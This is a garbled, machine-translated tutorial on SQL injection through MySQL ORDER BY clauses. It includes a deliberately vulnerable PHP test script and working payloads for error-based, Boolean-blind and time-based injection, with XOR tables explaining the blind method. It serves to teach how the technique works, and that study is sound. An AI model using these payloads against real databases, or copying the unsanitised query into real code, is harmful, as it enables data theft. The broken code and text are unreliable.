Read the previous gr36_ predecessors in the Prophet on the topic, which refers to the sequencing injection, this has frequently encountered such problems in the recent, so first summarize the order by sequencing injection of knowledge.
0x00 background
Read the previous gr36_ predecessors in the Prophet on the topic, which refers to the sequencing injection, this has frequently encountered such problems in the recent, so first summarize the order by sequencing injection of knowledge.
0x01 Environment Information
Test environment: Operating system ubuntu0.14.04.1 mysql:5.5.55-0
Test code:
<?php
$mysql _server= "10.10.10.136″;
$mysql _username= "root";
$mysql _userpass= "xxxxx";
$mysql _select_db= "Test";
$config =mysql_connect ($mysql _server, $mysql _username, $mysql _userpass) or Die (Mysql_error ());
$db =mysql_select_db ($mysql _select_db) or Die (Mysql_error ());
if (Isset ($_request[' evil ')) {
$evil = $_request[' evil ');
$query = "SELECT * from Test order by user_id $evil;";
$query = "(SELECT * from Test order by user_id $evil);";
$result = mysql_query ($query, $config) or Die ($query. ' <pre> '. Mysql_error (). ' </pre> ');
$num = Mysql_numrows ($result);
$i = 0;
while ($i < $num) {
$user _id = mysql_result ($result, $i, "user_id");
$user = mysql_result ($result, $i, "user");
$password = mysql_result ($result, $i, "password");
$html. = "<pre>user_id: {$user _id} User: {$user} password: {$password}</pre>";
$i + +;
}
Mysql_close ();
Echo $query;
Echo $html;
}
?>
Introduction to 0x02 Injection method
Normal page:
1.order by with Error injection:
When the page shows MySQL error messages, you can use the errors to inject.
? Evil=and (Updatexml (1,concat (0x7e, (select User ())), 0))
2.order By and Blinds:
Boolean blinds are used when the page does not display MySQL error messages and can only be judged based on the state of the page's echo data.
"Of course rain master also mentioned can use time blind select * from Test order by user_id, (select 1 from (select Sleep (3) a)"
This uses the ^ (bitwise XOR) of the bitwise operator, and of course MySQL has | (bit or),& (bit and), ~ (bit to reverse),>> (bitwise Right SHIFT),<< (bit left) operation symbol, bit sign feel a lot of magical magic is not ready to:-).
^ (Bit XOR will convert the numbers before and after to 2 and then make the XOR.
Because the match is matched to the time when the data returns 1 (00000001), the 1 returned will be different from the binary of the data in the user_id, and then sorted in ascending order by an XOR result, so the displayed arrangement will change.
When the regular match is not matched to the date when the data returns 0 (00000000), any number and 0 XOR result is itself, so the data in the USER_ID and 0 are unchanged or sorted.
Therefore, when the page sort is disordered, it indicates that the regular match to the correct data, the page sort does not have the disorder, then the regular does not match the data.
By changing the order to determine whether the returned results are correct, the MySQL version here is: 5.5.55-0, so use the following statement can match to the data, so the order has changed, here ' ^5′ can also be converted to ^5 16, so that the statement is not quoted.
evil=^ (SELECT (select Version ()) RegExp ' ^5′), the regular return result is 1, and then the value after the user_id is different or, the following results are obtained.
| before sort | after sort | |||||||
|---|---|---|---|---|---|---|---|---|
| user_id | user_id | user_id^1 | user_id | user_id | user_id^1 | |||
| 1 | 00000001 | 00000001 | 00000000 | 1 | 00000001 | 00000001 | 00000000 | |
| 2 | 00000010 | 00000001 | 00000011 | 3 | 00000011 | 00000001 | 00000010 | |
| 3 | 00000011 | 00000001 | 00000010 | 2 | 00000010 | 00000001 | 00000011 | |
| 4 | 00000100 | 00000001 | 00000101 | 5 | 00000101 | 00000001 | 00000100 | |
| 5 | 00000101 | 00000001 | 00000100 | 4 | 00000100 | 00000001 | 00000101 | |
| 6 | 00000110 | 00000001 | 00000111 | 7 | 00000111 | 00000001 | 00000110 | |
| 7 | 00000111 | 00000001 | 00000110 | 6 | 00000110 | 00000001 | 00000111 |
Because the order by default is in ascending order, the page displays the following effect:
The evil=^ (select Version ()) RegExp ' ^aaaaaa ') failed to match the data and therefore returned 0.
The result returned when the regular mismatch to the data is 0, 0, and any number XOR result is the number itself, so the sort is constant.
| user_id | user_id | BinaryRegular (0) binary | user_id^0 |
|---|---|---|---|
| 1 | 00000001 | 00000000 | 00000001 |
| 2 | 00000010 | 00000000 | 00000010 |
| 3 | 00000011 | 00000000 | 00000011 |
| 4 | 00000100 | 00000000 | 00000100 |
| 5 | 00000101 | 00000000 | 00000101 |
| 6 | 00000110 | 00000000 | 00000110 |
| 7 | 00000111 | 00000000 | 00000111 |
3.order by and union query:
When $query = "SELECT * from Test order by user_id $evil;"; It is not possible to use the union query directly when the brackets are not wrapped.
When $query = "(SELECT * from Test order by user_id $evil);"; When wrapping with parentheses, the union query is now possible.
This is also described in the official MySQL documentation < from the MySQL 5.5 reference manual, which says in the document and puts order by or limit behind the last one,
The test mysql:5.5.55-0 can be performed before it is placed in front. Of course, this is not very common.
0x03 a little summary
Because the arguments passed in with precompiled execute SQL statements cannot be used as SQL statements, such as ORDER BY xxx desc Here the collation is still only used stitching,
Therefore, an order by injection may be a key focus of SQL injection points for subsequent vulnerability mining.
Have a good hand. Inject Order by sort article
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
